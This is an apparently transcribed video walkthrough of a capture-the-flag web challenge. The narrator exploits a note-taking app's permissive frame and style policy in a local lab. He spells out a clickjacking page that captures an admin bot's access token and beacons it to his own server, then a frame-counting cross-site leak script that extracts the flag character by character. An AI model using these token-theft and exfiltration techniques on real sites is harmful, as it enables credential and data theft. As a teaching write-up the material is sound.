Hello everyone and welcome back to yet another video. Today we're gonna do a challenge from Shakerhead SSMCTF, which is called Yet Another Boring Node App, which demonstrates some pretty advanced client-side exploitation. And this challenge was really difficult. It had only 3 solves, and I think it was a really cool challenge, and I wanted to showcase it to you. And if you want to follow along with this video and with me, you can go to this page, shakerhead.ssm.sc/challenges, and you can grab this challenge from SSM 2026 qualification round. And we can also see that there is this page as well as the challenge zip file, and the challenge description is there's already 67 node tabs out there. Why make another one? Explosion. And it really doesn't say anything to us, but we have those files here. And this is the URL. Of course, we are gonna first exploit this on our own system, and then we're gonna exploit it on the server. So let's jump into it. So let me just exit here, and I have downloaded the yabna.zip file and then extracted it. And the one thing that you will want to change is go to the Docker file, and then you will want to set the base URL to something here. I set it to 0dgym.hack, and you also have to set /etc/host files here to 0dgym.hack, for example, because we will want a host for the challenge. And once you set it, you can just go ahead and type in, just create a Docker container and then run it. So sudo docker run expose the port 333, and then we're gonna add host 0dgym.hack to this local host and name the container node app. I'm going to enter my password, and then I have already the container running, so I'm going to sudo docker ps sudo docker kill this sudo docker remove, and then I'm going to launch the container again, and we can see that it is working now. So if I go to 0dgym.hack, we can leave a node here. So one thing, so first let's explore the application, and then we're going to look at the JavaScript code and how everything works. So first we can leave a note. So let's say please subscribe, and you should subscribe to my channel as well. And we can see that there's my node. We can see some kind of an input for flag access token. We don't know what it is yet. So if we go back, we can go ahead and search for the node. Let's look for please, and we can see please subscribe here. One thing that I want to point out here, which is pretty interesting, is that the node is being loaded in an iframe. And this is actually going to be handy for us later on while exploiting this challenge. So that's what I wanted to point out. And also we have the node source, the node being loaded from the hash or the fragment here. So if I create another node, we can see this is the fragment with some kind of an ID. So this is going to be handy for us later on while exploiting this challenge. And then we can also see that we can report a URL to admin bot visit paste a URL, and the admin bot will visit it. So this might be interesting for us later on as well, but we don't really know anything too much right now. So let's take a look at the source code. This is going to be pretty difficult to understand, but I'm going to try to explain it as best as possible. So let's take a look at main.js. I'm not going to look at package JSON or all of the packages because there's no vulnerabilities there, and I don't want to waste your time here. So we are just defining some variables here, nothing too interesting. We have the first function here, clear nodes, which is just clearing nodes, and it's clearing all of the nodes, and then it's setting only one node. And the only node that's being set is the flag node, which has the flag ID, and it has the flag inside, which is being declared by the environment variable up here. So the owner for this node flag is admin, and then we are just clearing nodes every what is this, like 15 minutes or something like that? No, 60 seconds times 15, or or I think it's like 15 minutes. So we are clearing our nodes here. Then we have this function check admin, and it is taking the access token that we pass via query parameter, and then it is returning true if we are admin, and it is checking if we are admin, if our cookies are the same as admin cookie, and if our access token is the same as flag access token. Then we have this CSP here in the app, which is quite interesting, and the comment says please for good here, which is quite funny. And the CSP actually is really restrictive. It's saying default source, it's setting default source to none, script source to self only. Then we have this pretty interesting style and frame source. Style source being set to unsafe and line, and frame source is being set to star. So these are going to become be handy for us. But if we take a look, for example, at the CSP evaluator here, and then paste the CSP, we can see that it says CSP is pretty secure. The only thing that it is picking up is the script source to self, because if we can upload files to the system, then we can execute JavaScript, because we can reference the file that is on the system. But in this case, we don't have any way of uploading files on the system that we can reference to later. So this isn't really exploitable. But the style and frame are going to come in handy for us later. Let's look further in the app. This is just setting some kind of a session for the user, and we can see some paths being defined here. So slash is going to index, then nodes going to nodes HTML, search to search HTML, and admin to admin HTML. We can try slash admin because we haven't tried it. Or the admin is just the report URL to admin, so it's not interesting as well. Then we can see that we can post nodes. So post API/nodes, and then it is restricting us from posting a fake flag. It is just basically checking if the node starts with flag characters, and then if it does, then it says bad node. So we cannot create nodes that starts with the same flag format. And then we are being redirected to nodes/ID. We also have this API node search, and we are checking if we are admin here. So we cannot really just go ahead and search for the admin flag node via search, because if we enter SSM, let's go back here, go to nodes, and then SSM, because our flag starts with SSM, like up here, then it is not really working. It says no matches because we are not admin, and it is restricting us from getting the flag. And then we must enter 3 or more characters to search for the flag, and it says do not leak secrets to non-admins. So we are checking that, and then we are displaying nodes via iframe, which is quite interesting as well. The other route that we have is /API/nodes/ID, and it is getting the node ID. And the way it is getting the node ID is when we create some kind of a node here. This is the node ID that we have created, and we have no way of manipulating that node ID or doing anything with it at all. So the node ID we cannot manipulate. We could also think that there could be some kind of a CSPT, but we don't really have a way to exploit it, and there isn't one as well. And it is also checking if we are not admin, then it is not displaying the node here if the entry node includes flag. So we cannot just basically go ahead and look at the flag here. And then we also we can post to admin /API/admin, and what it does, it consumes 1 admin rate, so we cannot really spam the admin with a lot of requests, because it has some kind of a rate that we cannot really bypass. And what it does, it enqueues admin visits to URL, and we will take a look at this later. Process admin queue, admin.push. So yeah, we will take a look at this later, but it is basically just queuing the bot to visit the page that we provide here. If we enter a page here, then it is queuing the page. If we scroll down here, we have a path /API/flag/health check, and it is getting the notes with the flag ID, and it is returning us the note with the flag ID, which is going to be handy for us later on. So if we go to API/flag/health check, I'm actually doing it on the server here. I'm going to do it on my local page. We can see that flag note is presented here. So we will take a note and we will look later. And now we have this async function visit note. I actually missed it. Where was it called? It was called here on the process admin queue. It is being called visit note with the URL that we provide. And this is the most interesting function because it creates a Puppeteer bot that opens our page and then goes to our page. I'm going to make some observations here before actually because I actually know how to solve this challenge. So I'm just gonna show you how we would I guess I will talk about what is actually vulnerable here. So if we take a look at this visit node, it is launching a browser, and then it is trying to open a new page, and then this new page is just base URL, so just slash, and it is basically being open to set cookies. And then we have this page too, and we are going to our URL here and waiting for 5 seconds. This is the first thing that is quite interesting, because only after going to our page, the bot is checking the URL here. And what we are doing here is we are firstly loading the page, waiting for 5 seconds, and then only then we are checking if our page starts with base URL. It includes notes with hashtag, and then if we split and basically if our note is the flag ID, only then we are going to click on hashtag access ID, which is presented on the page, and then we are going to type flag access token. So the first thing for this challenge is we have to leak flag access token, and because only when we have the flag access token we can actually leak the flag. As if we take a look at let's say, let's go down here. Well, let's firstly just try to exploit this, and then we are going to explain what we are doing with the flag ID. Because we've seen in the check admin function here that we check if our access token is equal to flag access token. So we cannot really just get the flag without having the flag access token. So that's the first step that we have to exploit, is getting that flag ID, and only then we can get the actual flag. And then after that we are just going to close the pages. So that's a lot, and I hope you followed along with me. So I'm gonna try to now show you how everything works here. So the first thing that we have seen in the page is the CSP. And CSP allows us to basically frame everything. And now let's just check the node if we have some kind of an HTML injection. So h1 tag with test and then /h1. So, and if we create a node, we can see that we have HTML injection. But of course, because of the CSP, we cannot just simply do script source equals to x on error equals to alert, because it's too simple and it will just not work, because we have the CSP here, and it is not going to execute. We could bypass the CSP if we manage to upload some kind of a JavaScript file on the page. Then we can just simply do script source equals to that https 0dgm.hack 3333, and then let's say exploit .js, and then we would have the JS page, but we do not have the ability to upload any JavaScript files to the page. But what we can actually do is we have an ability to iframe pages, because we have iframe frame source to star. So if we do iframe and then do source is equal to https wikipedia.com. Let's see, can we actually iframe Wikipedia? Yeah, we can. So sweet, and we can see that we can iframe Wikipedia here. I have this server here, so I'm going to open Alacrity, and then I'm going to open my server. And if I go to /var/www/poc, let's actually just create a test page, echo test into test. So we can just, if we cat test, we can see it, that test is here. So if I go to pod0dgm.dev/ I guess test, we can see that there's this just test, and we have this test. So my server is working, so I'm just going to remove this test file. And if I just create a simple, let's do vim exploit.html, and then HTML body h1 hello, h1 body and HTML. So let's try to iframe my page. pow.0dgm.dev/exploit.html, and we can see hello. Great, so we can iframe other pages, but what's in it for us? Because the admin only enters the flag ID that we want to leak only if our page starts with a base URL, of course, and it includes nodes, and then the node ID is flag ID. But of course our node ID is not going to be equal to flag ID, because, well, we don't really it is our node and it's not the flag node. So the bot is not going to enter the flag access token at all. So first, what we can think of is how can we actually, if we can manage to get this page onto the attacker's page, and actually the puppeteer bot could enter the flag access token, how do we actually leak this? So if we take a look at the page, at the JavaScript here, the puppeteer bot just clicks on the element with access ID, and then it types the flag access token. So what we could do in theory is we could, if we go to the server, I'm going to start writing the exploit. Let's do HTML. I just want to make it a little bit more pretty. Body, and then if we could like create a page here, we can basically make puppeteer bot click on the flag access token, but because we have this unsafe inline style, we can make our page across all of the website here. And if the bot clicks on flag access token, we get something called clickjacking attack. And then the bot actually enters the flag access token to our page, and we can then leak it. But the problem is that we need our URL to start with the flag ID. And how can we actually do that? Because we cannot just send the bot to flag ID and then somehow leak the flag access token. So what comes in handy here is that nodes are being loaded because of this hashtag, and this hashtag is called fragment. And if you know how fragments work on pages, basically we can go to any page here. If we even go to this page and then hashtag anything here, it doesn't actually load something, because what fragments do, they usually are for example, scrolling down to some kind of a part of a page. If we click on, I don't know, maybe it would be like footer here, and then we could go to hashtag footer, and then the page would basically just scroll down to the footer, and then we would not reload the page. But in this case, the hashtag is being used to load the node. So if we take this node, and let's say because we have the node ID of the flag, API/flag/health check, we have this flag ID here. So what we can do is, if we replace our ID from, let's reload this, from this our own node ID to flag ID, the page isn't going to change, because flag ID, because of the way the fragments work, we would have to refresh the page, and we can see that node not found of the flag ID. But if we go back and then create a page here and then replace it, it doesn't actually load the flag node. So with this knowledge, what we can do is, if we go ahead and look at this iframe that we have created here, this is the iframe, and if I go to console, I can basically manage from where I call my commands. Right now I'm calling it from the top of my page. So if I do like a document.location, we can see that the location is 0dgym.hack and then the node ID. And if I just click on the stop and then scroll down to exploit.html here, so we are now inside this iframe, and if I call document.location, we can see that we are calling from pog.0dgym.dev. And on iframes, we actually have the ability to manipulate the parent a little bit. So what we can do is let's say parent.location, and then we can see that the parent.location is actually the page, this page. So let's redirect the parent.location to be equal to, let's say just nodes hashtag, and then the node ID of the flag, and we should go back. Let's actually do the full URL. Okay, so this is the node of this is our attacker node. Let's just create a new one. So this is the attacker node, F9BE, right? And then the flag node is F5344. So if you are tracking with me here, if I go to the exfiltration.html here and then do document.location, not document.location but parent.document.location maybe is equal to, this is the flag ID, and if we copy this is our page. We cannot do parent.document.location, but what we can do is parent.location, and we changed it to F5344, and we can see that it has changed. And we changed the parent page, we changed the whole top page from our iframe. So with that in mind, you might be able to piece together the first exploit for the challenge. To do that, we have to create an input on our attacker's page, and the input should take the whole page, should be on the whole page. And then what we can do, we can manipulate the style of this page to be to make the iframe across the wall page. I know that I'm saying page a lot, but I hope you are tracking a little bit with me, at least. It will all make sense a bit more when we are exploiting it. And then the Puppeteer bot will click on flag access token, and then it will enter the flag access token, but actually it is going to enter the token to our page because it is over the flag access token, and we are going to get the token that we require here. I know that's a lot and it might be confusing, but I'm going to show you how everything works here. So first we're going to create an input, and we're going to make a style of the input to be height 100%, and then the width also to 100%. And then the ID of the input is going to be access, because that's the ID that we need. And then just /input. We don't really need anything else here. And then we can create a new JavaScript like this. I'm just going to end all the tags, body and HTML. And then on the script here, what we can do is, what we want to do is try to, first of all, change the parent ID. Second of all, we want to make the page wait for the input to be entered here. And once the input is entered, we want to exfiltrate the data to our own server. First things first, we want to set timeout. And then the timeout is going to be like, let's see, like this. And then the timeout is going to be like 200. It really doesn't matter. But we just want some kind of a timeout to wait for the page to load. And we can do parent.location like we did previously, http, and then 0dgm.hack, like this. And what we did here is we changed the parent node ID to the flag ID. And let's just check if it's correct. Yep, it is correct, flag ID. And then after changing the page location, we are going to create a new listener for the event, for the input event. So first let's get this input element. So let's do access is equal to document.get element by ID access, and we are going to take this access input, and then what we will do is access, let's actually do it like this, dot add event listener. We're going to look for the input event, and then we're going to take this event object, let's see, I'm thinking, how do I want to do this? Let's take the token is going to be the token that we pass in, we get passed by the flag ID. So our token is just basically going to be e.target.value, and we're just going to check if token.length is more or equal to 64, because our node ID is 64. If we take a look up here, we can see that it says crypto random bytes for the flag access token is taking crypto.random bytes. It's taking 32 random bytes, and it is making them to hexadecimal characters. So 32 times 2 is 64. If token.length is more than or equal to 64, we are going to create a new beacon request to our server. So navigator.send beacon. And then I have this server that we can exfiltrate data to, pog.0dgym.dev/exfil. And then we are just going to append, let's do, it is going to just send it as a post data. So we can send it to exfil and then json.stringify token. Like this, I hope it's correct. So we are going to send the token as a JSON object via navigator.sendBeacon. And then after that, that's going to be it for the event listener probably. And what I also want to do is I want to keep trying to focus on that input element, because if for some reason the bot actually manages to click on the node flag access token, my script is going to immediately just take over the control of focus from the flag access token to the page. So to do that, we can just do set interval, and then we can just do an interval for like I don't know, maybe like 1 millisecond really quickly. And then in this interval, actually here, what we can do is we can window.focus document .body.focus, and then we can also do, just to be sure, .get element by ID access .focus, and then we can also copy this, and instead of focus we can do click. So what this does, it basically just keeps focusing on the access ID, and access ID is going to be this input, and basically it's going to be permanently focusing and clicking on it and focusing on this window of our attacker's page, so we don't really lose focus and we don't give the flag to the page here, and we get the flag from our own server. I think this is it for the script. I'm just looking to see if everything looks fine. I think it does. I don't really think we are missing anything here. So let's actually just test it before we send it. So if we go to pog.0dgym.dev/exploit.html, we are being redirected to this page, but let's just comment out this parent.location, and then let's enter it again. We can see that we have an input over our all page, and let's just enter 64 characters, test. So it's 8, 16, 32, and then 64 like that. Let's enter more, and let's see if we actually manage to exfil. I have a way of exfilling here in my page. So I have this exfil.log, and we can see that this is from my previous testing. We can see that we actually didn't manage to exfiltrate. Let's figure out why. Token.length. We are sending beacon to pog.0dgym.dev.exfil. see test. Did we exfil the data? We have exfil test here. So we are getting the element access. I see the issue. We have .event listener here. It should work now. I hope so. I typoed that. So let's see. Let's actually go to sources and see if we see any bad syntax. I don't think so. So it should be fine. So let's enter test again. So it's 8, 16, 32, and then 64. Let's enter one more just to be sure. And then if we look at exfil.log, we can see that we managed to exfiltrate this data. Great, so we have this attackers page, but of course, if we just upload it like this as a note, if we do iframe and then source equals to poc https poc.zerodjm.dev/exploit.html. Let's create a note. We can see that we actually have this and we can enter input, and it is actually working well, I think so. We should probably uncomment this line so we get the parent.location set. So let's try to reload it again, and we can see that our location magically changed to the admin flag ID that we need, and we still have our attackers page. So that's what we actually want here. But now let's try to make the CSS correct so our exploit can actually load. So let me edit this page, and then if we take a look at this iframe here, what I want to do is I will assign some kind of an ID to this iframe. Let's just do ID is equal to exploit, I don't know, or maybe access. This is going to be a little bit better, because maybe the page is going to focus on the iframe. Of course it shouldn't, but if we click on this plus button here, we can see iframe #access. And what we can do is we can do position to be fixed. So it is going to escape from this, then top is 0, left is 0, and then let's do height like 100 VH, and then width maybe 100%. Can we do that? Yep. We can see that we have our wall page filled with our input. Where is it? Let's see this iframe. And then what I also want to do, just to make the clickjacking attack more believable, is make opacity to 0001 like this, and then we can see that our input is completely invisible. I just copied this rule, and we can see that wherever we click here, we are entering data to our own page. So let's try to test it on our attacker. Let's paste the iframe here. Let's wrap it in a style HTML tag. And then if we create a note like that, we can see that our cursor changes and we can actually enter data here. So let's try to leak the flag to our page by just creating this iframe with the note. So one thing to keep in mind if you're doing it on your own, you can see that the note has become the flag ID. So we just have to go one page back and we can see that this is the node. If we load this node, we can get everything working. So if I click on report URL to admin, this should pass all the checks that we have. If I go to main, it should bypass that path check, and the path should be good because our page changes the path to be the flag access token, and we should be able to leak the token. If I click send to admin, admin visit is queued. Let's wait for 5 seconds, like in this timeout. So it's probably been around 5 seconds. And if I go to exfil.log, let's see if we actually managed to exfil anything. And I think that we did not manage to exfil data. So not sure why is that. One thing that I want to check is, did I specify my page correctly here? And I did not, because I put it HTTPS and not HTTP here, and we cannot really open HTTPS pages. So we will just have to restart the server. Let's start the server again. We also have to remove the existing container. And now we have removed and deleted the container. So let's start the server. And the bot didn't visit the page because basically the URL didn't begin the way that we needed to begin. And it is not going to work again because we need to change flag node ID because we restarted the server. So if we delete like this and then we pasted the good ID, it should work right now. At least I hope so. So let's go back. Let's create a new node, because we actually need to create a new node. This one. This is working fine. Let's copy this node ID, report URL to admin, click on report, wait for 5 seconds, so sleep 4 or 5, and then it should have been loaded. So if I go to exfil.log, and we can see that we have actually managed to leak the flag node ID that we require to leak. So it looked difficult. If you understand it, it's not really difficult, but that's only the first part of the challenge, and that is actually the easiest part. Leaking this is not as difficult as leaking the actual flag itself, because for the actual flag we have to use something called cross-site leaking, and this technique is a bit more difficult, not reliable, and hard to execute in a real-world scenario. In this case, because a bot is visiting our page, it's going to be a little bit easier, but it's still going to be a lot of pain. So let me actually explain how this works. So what I can do, I will quit this and then flag node ID. I actually didn't copy it. Excuse me, let's just copy it one more time. Copy this flag. It's not flag node ID, it's actually, what is it called? It's the access token. So access token. Not sure what's spacing for me here. This is whoa, no, not sure. Why is it not working? Yep, here we go, final. I couldn't paste it for some reason for a bit here, but we have the access token. So how do we actually leak the flag? So this is the hard part, which I spend the most time on, and you can research what is cross-site leaking on this page accessleaks.dev. It outlines a lot of different techniques and everything on how you can leak data from different pages. Essentially, what happens here is we have this node search functionality. If I create a node, here, let's go to slash. Actually, on this page, let's do test node. We can search for test node. And what is being loaded here, there is being loaded this iframe. Alright, and what we can do is if we actually go to the console and then let's do window.size. Wait, I'm actually I actually forgot how to do this. Let's go to iframe, frame counting. This is the attack. So we can count how many pages, how many frames are on a page. And what we can do is look for windows.length. So let's do window.length. We can see 1. If we let's create another node, and another node. So now we have 4 pages. So if we look for test, we have 4 nodes here. So if we do window.length, we can see 4. And so what we can do here, how we can exploit it. So we know that the flag begins with SSM, right? And then this curly brace. So what we can do is we can define a character set, so A, B, C, D, E, F, G, everything like that. And then we can basically brute force. Is it A? Is it B? Is it C? Is it E? And in this case, we can see that it's E because we have this example flag for testing. And then we can count how many frames are on the page. So if we enter SSMA, there is nothing is going to appear here. If we enter SSMB, nothing going to appear. If we enter SSME, then there is going to appear a page on the attacker, on the bot that is visiting the page. And because the bot has all of the requirements, we are going to pass in the access token as parameter. We will have the admin cookie for the bot as well, and we will basically just pass all of the check admin like checks, and we will be able to search for the flag node. And so the bot is going to load the flag node, and we will be able to see the flag, but we cannot like leak the whole page to the attacker, so we just have to brute force each character of the flag. Not really sure if that makes sense. What I can actually show you is I can just open, let's do pog.0dgym.dev/exploit.html just to showcase this. Let's actually create a new page. Let's do leak flag.html, and then I'm actually going to code this in VS Code because I'm not really that good at JavaScript, and I might need some help with the syntax and everything. Don't really want to screw it up, so leak flag.html. Let's do like HTML5 like this, and then we do not really need anything here. Let's do script. So script like this. So the first thing that I will do is I actually will define some variables. So I'm going to create a constant config object, and this object is going to contain access token. and the access token is the one that we had. It's this one. It should be 64 characters actually. Is it 64 characters? Yep, 64 selected down here. So we have the access token. We are going to define base URL, and the base URL is going to be 0dgym.hack, like this. After that, let's define, let's see, let's do flag prefix, prefix, and the flag prefix is going to be SSM, like this. And then we are also going to need a character set, and the char set I'm going to let copile generate, like this. A, B, C, D, E, F, G. Is this, I'm also going to add dash, and I think those are all the characters that I may need. We will see. If we need something else, we are going to add it. And that's going to be it for our config. I know it's a lot and you might not understand it right now, but I will show you it in a little bit. So let me just copy it for now and then paste it to my server. Leak flag.html. And then if we go to poc.0dgym.dev, leak flag.html, we can see that there is nothing here. But what I want to do is, I will do window.open, and then I'm going to open HTTPS, or actually HTTP:// and then I'm going to open search. Let's just paste everything here. Search, and I'm going to search for test, right? Because we have a test on the page. Let's make it blank. And then we are going to open the page, and we can see that there are 4 results found. So what we can do is, we are here on our attackers page, and we can actually store this window.open as a variable. I'm going to close and open it again. So we have this win variable, and if we do win.length, we can see that we have 4 results there. So we have 4 available nodes with test. I just want to demonstrate it really quickly. So if we have test, right, we are still going to return all of the 4 tests, because test begins with test, right? I hope this makes sense. And if we do window.length, it's 4. But if we open tests like A, let's say A, then B, then C, if we are brute forcing, if we go open test A, test A, right, open this, we have 0 results found. And if we do windows.length, it says 0. And if we do a test B, we also will have 0, because, well, there's nothing there. But if we go ahead and just go through the whole alphabet and go to test, then we can see that window.length is 4. So this way we can actually leak the flag, because we have everything we need. We have the node ID, we have an admin bot that visits our page, so we can just leak the flag like that. So let's actually implement this, and this is going to be a little bit tricky. So I'm going to define a sleep function here, which is going to like that, is going to return a new promise, and it's going to set a timeout for some kind of time. Not sure if I actually need those braces here, so I can just call like sleep 100, and then we are going to sleep for 100 seconds here. Then the second thing that we will have to do is, I will define a function to get a character. And then I'm going to call that function a lot of times, so while we loop through all of this char set. Don't need this, so I'm going to create the async function called check character, and then I'm going to give it prefix, and then character itself. And then what we will do is we are going to construct the URL like it is suggesting here. Let's do it like this, config.base URL, like that. Then we have search. And then let's see, then we have the Q parameter. The Q parameter is going to be Q is equal to prefix plus character, like that, and then access is equal to config.x. So this page is going to open the search page, and it is going to search for a thing that begins with our specified prefix, and we are going to give it the flag prefix here, and it is going to test a character. After constructing the URL, we can do a constant window is equal to window.open URL blank, and we don't need this. We're going to open our URL, and what we will do is if we .have window, we are going to console.log pop-up blocked and return promise. No, we're going to return we're just going to return. We don't really need anything else here. I already messed this up. Let's see what's wrong here. I think this is correct, like this. So if we don't have a window, we are going to return false, and we are going to resolve false as well, because we have this async function, so we need some kind of a resolve. And then we are going to create a variable found, and it's going to equal to false. And then we are going to loop over, like, let's do like 5 times. I think it actually already did everything that we need. So we are going to loop for like 5 times. Then we are going to sleep for like 100 milliseconds. And then if this is not correct, we are going to check if window.length is more than 0. Then we are going to make found equal to true, and then we are going to break. And then we are going to catch errors for any cross origin errors. I think this is correct. It should be correct, at least I think so. And then it's going to, after we open the window and check, we're going to close the window and then resolve found, and then character or null. We're going to return a character if we have a character, or null if we don't have a character. This is not really correct. Return new promise async, like this. this looks a little bit better. Alright, let's continue the exploitation. So we have defined this function here. So this function basically just checks each character that we we will create a main function that is going to call this check character function. And what I'm going to do is, in the main function, I'm going to create a batches, I guess, of characters that are going to be checked. And let's say we're going to check like 6 characters each like open of windows. So what is going to happen is we are going to open my page here. It is going to open 6 windows, and then it will wait for the windows to load. That's why we have this like await and stuff like that. We are waiting for the windows to load. So we are going to wait for like, I guess, 500 milliseconds. I guess I could make this longer. We will see if I need it. I'm not sure, but it is going to wait like 5 seconds or 500 milliseconds, I guess. And then it is going to check if the windows.length is more than 0. If it's true, then we set it to found and break. If it's not, then we are going to continue looking. And if we do not find the character, then we are going to return null. So that's basically the idea behind this function. And then after that, I'm going to create a new function, which is going to be, I guess I have to make it async function main. And in the main function, I'm going to define a flag like this. Can I like autocomplete like that? Yes. And then while true, we're going to look at found character. We're going to loop over all of the characters in the char set. I'm not actually going to do that, because if I do that, then we are going to open like 60 something windows. How many are there? There are 66 characters. So we are going to open 66 windows, and it could crash the Puppeteer browser. I'm not really sure. So for let's do let I equals to 0, while I is less than I guess char set length, and then we're going to I plus equals to, let's do 6, right? So we are going to loop over 6 characters each time, or this is actually 7, let's do 6, so replace it to 5, and then we're going to loop over 5 characters each time, right? So right now we are let me think, how do I want to do this? Let's create a const, let's see, batch, const batch, and then it is going to be config charset.slice, exactly how I want that. So it is going to create an array of all characters, and then let's do const promises equals to batch.split on nothing.map. Check for each character. Let's do batch.map, and then like this. So for each character, we're going to call a function get character with the flag and the character, and then let's do results like that. And we are going to find a character in the results. So if you don't really know like how it works, this basically just takes the next 5 characters from our char set. So A, B, C, D, E, right? Then this is going to return a promise for each of those characters over our check character function. After that, we have the results, and we are going to resolve all of the promises. And then after that, one of the results has the character, then we are going to return res, and if it doesn't have the character, then we are going to return null. And then if we have found the character, let's see, if the character is found, then we are going to flag plus equal to found character, and then console log found so far. Actually, we are going to do navigator dot send beacon on https pog.0dgm.dev slash exfil, and then let's do json.stringify flag just to be sure. Do I need those? I guess it should work. And then we are going to break. So it is going to exfil the flag after each time we find the character. And why I'm doing that, it's because let's say our script breaks at some point, we might want to call it again with the already found flag, and we are going to exfiltrate the flag once again. And then if we don't have the found character, it is going to exit. And I guess this is going to be it. And then the only thing that we actually have to do is let's do set timeout main, and then let's do like 1.5 seconds. Great, and I think it should work. I'm not sure. Something is wrong. Let's see, const config. We don't have a closing brace, curly brace for this. I think it's correct. Let's actually try this, but let me change the prefix to like hello world, right? So if I did everything correctly, I will create a hello world. I will just create hello world here, and here I'm going to delete the world. So we are going to try to delete to leak the world thing here. I'm going to copy this. I hope everything copied correctly. Like this, paste. Not sure why it didn't copy the above. I don't really need this line, so whatever. So if I now go to pog.0dgm.dev slash leak flag, like that. So in theory, we should wait a little bit here and nothing is happening. So let's check what is the issue. It says a config has already been declared at leak, and then badge.map is not a function. So I guess we do need that we actually do need that split here dot let's let the AI do split like that, split.map, right? And then where is my config? It says on line 88, on line 80, there isn't a line 80, so what's wrong here? Script here, leak flag.html. So this is wrong, And then oh, I didn't delete this page, so that's the problem. Okay, so let's try this again. I think my errors were fixed, and hopefully we don't get anything. Where did I screw up again? Bash.map is not a function. I didn't copy this. Let's see. Map. Bash.split map. This looks correct. Let's reload it again. We have no errors. We try to leak the first thing, and I think it is working correctly. So we still haven't reached the hello W. So let's wait for the W to reach here. As you can see, we are trying different characters. Hello T, and the next one should be hello W. And we didn't actually manage to leak it. Oh, did I create the flag hello world here? Hello. Nope, I didn't, and it doesn't exist. So my script is actually just not working. Let's close this and close all these pages. This is the actual website. We are going to try to solve it on the actual website later. So 0dgym.hack here. I hope I'm recording, yeah. If I go to search hello world, let's look at it. It exists, hello, and it shows me the hello world. So I don't need the exploit. Let's do leak flag.html. And it is trying to leak again. Let's see, hello J. I think the timeouts are fine because it's not taking too long. It's waiting for the pages to load. Let's see, do we have hello W? Yep, we have hello W, and then we have E after W. And then let's wait for the O to load. Hello WO. This should load, and then we should have hello WOE. Great. So our script is actually working. The last thing that we should check, let's kill this. Let's actually kill this. Don't need it anymore. Let's see if we actually manage to exfil the data. And we can see hello WO, hello W and hello WO. So we are successfully leaking the data from the web server, and everything is working fine. So let's see if everything is fine here. So let's just now replace vim leak flag.html. Let's replace flag prefix with SSM and the curly brace. And if everything is working correct, the only thing that I should do is send pog.0dgym.dev/leak flag.html to the bot on 0dgym.hack. Report URL to admin. Let's paste this URL in, and with the magic of cross-site leaking, if we take a look at exfil.log, we are actually starting to exfiltrate the flag. As we can see, example, we have got the example word, then it seems like it stopped. We still are leaking. Let's see. Let's actually, let's see. Example, I think it's example flag or something like that. Main.js. Example flag for testing. So it leaked a couple of characters, but not all of them, because it is only doing that for 5 seconds. So what we can probably do is we can reduce the timer here to like maybe sleep for like 50, and then it should be twice as fast. So if we send the page https org.0dgm.dev/leakflag.html, we should be getting this. Oh, we are leaking it from the start. That's because I haven't replaced the flag prefix. I forgot to do that. Yeah, and we can see that it is leaking now more characters. Example flag, because I did it a little bit faster right now. And it stopped on the F, so I can just copy this prefix and then go to leakflag.html and then replace the prefix like that, and then send the admin leakflag.html once again, and if everything is correct, let's see, flag for testing. Let's see, can we actually leak the full flag? And it stopped right after the last character because it needs more time, but yeah. Alright, and I will copy this and go to leakflag.html and then replace the flag prefix. Alright, we have replaced the flag prefix here. And now if we go ahead and submit our page https pog.0dgm.dev leak flag, submit our page once again, go to exfil.log, we have testing, and the flag is finished. So we have managed to exfiltrate our example flag for testing. Now I said that I would exploit this on the actual page here, but there was a problem. I tried recording that as well, but what happened here was it's not working because the organizers forgot to replace the host for this page. So in the Docker file, as we have seen here, we have to have this base URL here, and this base URL is they forgot to replace this base URL basically, and it is not possible to exploit on this real page to get the actual flag. But yeah, this is just like the page that they opened after the challenge is up, so I guess they just forgot to replace the environment variable. But this is how you exploit this challenge. And this is going to be it for this video, and this was like a super long video on how to exploit the ACTF challenge. I'm not sure if I explained everything correctly and if you liked everything, so please make sure to leave everything that you took from this video in the comments, and if you enjoyed this video. And if you didn't enjoy, I'm not sure. If you want more this kind of content, please make sure to comment that as well. I am open to making this because it was a really fun challenge, and I really enjoyed these difficult challenges. So this is going to be it for this video. Please subscribe to my channel, and I will see you in the next one. Goodbye.